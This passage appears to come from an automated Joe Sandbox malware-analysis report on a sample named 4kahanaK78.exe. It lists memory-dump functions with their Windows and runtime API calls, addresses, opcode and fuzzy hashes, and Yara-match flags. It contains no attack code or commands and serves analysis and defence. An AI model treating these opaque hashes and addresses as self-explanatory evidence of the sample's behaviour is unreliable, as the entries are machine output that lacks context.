                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                    • Instruction ID: 17f1ba636a3ac0ac971b1a3f484e478362915a153c89e36741bf365215ef3bb6
                                    • Opcode Fuzzy Hash: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
                                    • Instruction Fuzzy Hash: 9C118EB2585744B6D520B772CC06FCB7BEC6F48304F40481FB69E66063EA2CAAC04645
                                    APIs
                                    • GetConsoleCP.KERNEL32(00000000,00000000,00000000), ref: 04B57F82
                                    • __fassign.LIBCMT ref: 04B58161
                                    • __fassign.LIBCMT ref: 04B5817E
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B581C6
                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04B58206
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B582B2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                    • String ID:
                                    • API String ID: 4031098158-0
                                    • Opcode ID: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                    • Instruction ID: 8606dff038d5312d631dc210a50766c7e4134fa67084ac058c82fc762aa38f79
                                    • Opcode Fuzzy Hash: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
                                    • Instruction Fuzzy Hash: ACD1C970E016489FDF11DFE8D880AEDFBB5FF48304F2840AAE815BB261D631A952CB50
                                    APIs
                                    • GetConsoleCP.KERNEL32(00000020,00000000,00000000), ref: 00417D1B
                                    • __fassign.LIBCMT ref: 00417EFA
                                    • __fassign.LIBCMT ref: 00417F17
                                    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00417F5F
                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00417F9F
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041804B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                    • String ID:
                                    • API String ID: 4031098158-0
                                    • Opcode ID: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                    • Instruction ID: bf6bde338aaa4c5312f696cbfa7b8c1c2da82e764b9ff6896d8d464e3c4a4b13
                                    • Opcode Fuzzy Hash: 7d169ff53d2c182e8e6c437c86224f09291a86b025f17f4b0d862f02f7e42911
                                    • Instruction Fuzzy Hash: 13D19C71E042589FCF15CFA8C9809EEBBB5FF49314F29006AE815BB341D735A986CB58
                                    APIs
                                    • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                    • __fassign.LIBCMT ref: 1000B905
                                    • __fassign.LIBCMT ref: 1000B922
                                    • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                    • String ID:
                                    • API String ID: 1735259414-0
                                    • Opcode ID: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                    • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                    • Opcode Fuzzy Hash: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                    • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                    APIs
                                    • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                    • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                    • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                    • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                    • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                    APIs
                                    • GetLastError.KERNEL32(?,?,04B4B002,04B4A5C6,04B49C00), ref: 04B4B019
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04B4B027
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04B4B040
                                    • SetLastError.KERNEL32(00000000,04B4B002,04B4A5C6,04B49C00), ref: 04B4B092
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                    • Instruction ID: 5d97d5de8773b9d009742cf9eef0d20d8d296e21d72a888fe39dd23c57b746e0
                                    • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                    • Instruction Fuzzy Hash: 9D01AC3270D3116FBB346FB47C849762B54EB8167A72102B9F724562E1EF59F8127144
                                    APIs
                                    • GetLastError.KERNEL32(?,?,0040AD9B,0040A35F,00409999), ref: 0040ADB2
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040ADC0
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040ADD9
                                    • SetLastError.KERNEL32(00000000,0040AD9B,0040A35F,00409999), ref: 0040AE2B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                    • Instruction ID: f4b61bc4878066cd9e5532c4ff7823403916b0aca9ffed94e046062e6da044f3
                                    • Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
                                    • Instruction Fuzzy Hash: 6201D8722493125FE6342A76BC459572A54EB51779720033FF910B71E2EF3D4C32558E
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free_strpbrk
                                    • String ID: *?
                                    • API String ID: 3300345361-2564092906
                                    • Opcode ID: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                    • Instruction ID: 74ce9c3951af57ab81168c2b549ef3ab89f4257994a153330f65b8d48fe9ed26
                                    • Opcode Fuzzy Hash: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                    • Instruction Fuzzy Hash: 26615075E00219AFDB14CFA9C8809EEFBF6EF48314B258169DA05E7301E775BE418B90
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free_strpbrk
                                    • String ID: *?
                                    • API String ID: 3300345361-2564092906
                                    • Opcode ID: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                    • Instruction ID: 1b74f13dbcba2150a1fd9868d0adae7fc2dc7661cc718da73cb4b4ef5f34790c
                                    • Opcode Fuzzy Hash: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
                                    • Instruction Fuzzy Hash: 3E615F75E00219AFDF24DFA8C8806EDFBF5EF48314B1585AAE815F7354D631AE418B90
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free_strpbrk
                                    • String ID: *?
                                    • API String ID: 3300345361-2564092906
                                    • Opcode ID: 0b6f9c8e298a88ef6bfcf1d60ea57791d65df11c988ce29e8962c90e9ece18a3
                                    • Instruction ID: 08919aac2af5baaa0bc26bb502442345b411eba09a4371073371dd33b5eb5490
                                    • Opcode Fuzzy Hash: 0b6f9c8e298a88ef6bfcf1d60ea57791d65df11c988ce29e8962c90e9ece18a3
                                    • Instruction Fuzzy Hash: 34613F75E00619DFCB14CFA9C8815EEFBF5EF88354B24816AE815F7300E675AE818B94
                                    Strings
                                    • C:\Users\user\Desktop\4kahanaK78.exe, xrefs: 1000833B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: C:\Users\user\Desktop\4kahanaK78.exe
                                    • API String ID: 0-334991286
                                    • Opcode ID: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                    • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                    • Opcode Fuzzy Hash: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                    • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                    Strings
                                    • C:\Users\user\Desktop\4kahanaK78.exe, xrefs: 04B56388
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: C:\Users\user\Desktop\4kahanaK78.exe
                                    • API String ID: 0-334991286
                                    • Opcode ID: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                    • Instruction ID: f552e073e65239589d6095b5991a64c7f020a132d82bace3d2b8a8f69f5e1887
                                    • Opcode Fuzzy Hash: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
                                    • Instruction Fuzzy Hash: 7221D471600105BFEB20BF698C80E6BB7ADEF402A874185A4FD2DC7260E731FC519760
                                    APIs
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0040BED8,?,?,0042B000,00000000,?,0040C003,00000004,InitializeCriticalSectionEx,0041EAF4,InitializeCriticalSectionEx,00000000), ref: 0040BEA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID: api-ms-
                                    • API String ID: 3664257935-2084034818
                                    • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                    • Instruction ID: 1d2ba87bd7351691bab4046b775a4f225d6c09ed93031ba1482b23a36008251d
                                    • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                    • Instruction Fuzzy Hash: 1B11C135A41620ABCB228B68DC45BDA7794EF02760F114632EE05B73C0D778EC058ADD
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                    • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                    • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                    • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                    • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0040EF44,?,?,0040EF0C,00000000,7591DF80,?), ref: 0040EF64
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EF77
                                    • FreeLibrary.KERNEL32(00000000,?,?,0040EF44,?,?,0040EF0C,00000000,7591DF80,?), ref: 0040EF9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                    • Instruction ID: a9aeb9bb373945a448fb4c2f2a76f55d061337ba3b70deabe2e5838c542f66b1
                                    • Opcode Fuzzy Hash: 607d73432645c26095c79918e0b94193a9778d3018f0e4e6e685341166a2a245
                                    • Instruction Fuzzy Hash: E0F0A070A0421AFBCB119B52ED09BDEBF78EF00759F144071F905B21A0CB788E11DB98
                                    APIs
                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                    • __alloca_probe_16.LIBCMT ref: 1000A736
                                    • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                    • __freea.LIBCMT ref: 1000A837
                                    • __freea.LIBCMT ref: 1000A843
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: __alloca_probe_16__freea$Info
                                    • String ID:
                                    • API String ID: 2330168043-0
                                    • Opcode ID: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                    • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                    • Opcode Fuzzy Hash: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                    • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: __freea$__alloca_probe_16
                                    • String ID:
                                    • API String ID: 3509577899-0
                                    • Opcode ID: 378295b6f49c7a1482985147ff9c11c2e1bf4f3a81760b0e32bf93aa04d95b4b
                                    • Instruction ID: f2b5e5426fedb8598fc76fae10d55257e5a04a8e30a18f0e2ceb2f17756af3bc
                                    • Opcode Fuzzy Hash: 378295b6f49c7a1482985147ff9c11c2e1bf4f3a81760b0e32bf93aa04d95b4b
                                    • Instruction Fuzzy Hash: 5C51F576600206ABFF605F658C81EBB3BABDF44754F1901A8FE05D7140E73AFD11A6A0
                                    APIs
                                    • __alloca_probe_16.LIBCMT ref: 1000B03B
                                    • __alloca_probe_16.LIBCMT ref: 1000B101
                                    • __freea.LIBCMT ref: 1000B16D
                                      • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                    • __freea.LIBCMT ref: 1000B176
                                    • __freea.LIBCMT ref: 1000B199
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                    • String ID:
                                    • API String ID: 1423051803-0
                                    • Opcode ID: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                    • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                    • Opcode Fuzzy Hash: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                    • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                    APIs
                                    • __alloca_probe_16.LIBCMT ref: 00413724
                                    • __alloca_probe_16.LIBCMT ref: 004137EA
                                    • __freea.LIBCMT ref: 00413856
                                      • Part of subcall function 0041249E: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                    • __freea.LIBCMT ref: 0041385F
                                    • __freea.LIBCMT ref: 00413882
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                    • String ID:
                                    • API String ID: 1423051803-0
                                    • Opcode ID: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
                                    • Instruction ID: 356f55c8d52bf468307c9bd9aee3ed648f54657124d7a114e97aef17e3d97ec8
                                    • Opcode Fuzzy Hash: 108019662ccab921f27eff110a88a80a1d8b3600edd5f6f257505aea3f790572
                                    • Instruction Fuzzy Hash: 6151D3B2600206ABEF20AF55CC41EEB36E9EF44755F15412EFD18E7290D738DE9186A8
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 04B42C5F
                                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04B42C74
                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04B42C82
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04B42C9D
                                    • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04B42CBC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                    • String ID:
                                    • API String ID: 2509773233-0
                                    • Opcode ID: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
                                    • Instruction ID: 8e0c3b542556c10dfa7e3922ea7325ac6b0ed9a3e589e4877d3c30077f841730
                                    • Opcode Fuzzy Hash: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
                                    • Instruction Fuzzy Hash: 71310471B00014AFDB18DF68DC45FBAB768EF88704F0541E9F905EB252DB31A912EB94
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                    • String ID:
                                    • API String ID: 3136044242-0
                                    • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                    • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                    • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                    • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2594383754.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4ce0000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                    • Instruction ID: d3862564c1c448d0eb3923a45cdf49f18f6833f21556cac3654b71cf7d9cec13
                                    • Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                    • Instruction Fuzzy Hash: F6F06872701100A785A4EF5DEC86C1677DBAB00720BA48819F544D7503CB3DF9529655
                                    APIs
                                    • _free.LIBCMT ref: 1000C536
                                      • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                      • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                    • _free.LIBCMT ref: 1000C548
                                    • _free.LIBCMT ref: 1000C55A
                                    • _free.LIBCMT ref: 1000C56C
                                    • _free.LIBCMT ref: 1000C57E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                     • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                    • Instruction ID: 9141c028a1f6e8267eca5b553c4c44ea57822cd8596d4ab818939ac7a44c1903
                                    • Opcode Fuzzy Hash: 5af9cd1d934eff50961f68469d6981d65bd4349cdb7ac1437da5aad4e87a5e75
                                    • Instruction Fuzzy Hash: BEF0E739A046289BE650DB68ECC2C1A73D9FB456E17608805F448E7699CB34FFC08AA4
                                    APIs
                                    • _free.LIBCMT ref: 04B57260
                                      • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                      • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                    • _free.LIBCMT ref: 04B57272
                                    • _free.LIBCMT ref: 04B57284
                                    • _free.LIBCMT ref: 04B57296
                                    • _free.LIBCMT ref: 04B572A8
                                    Memory Dump Source
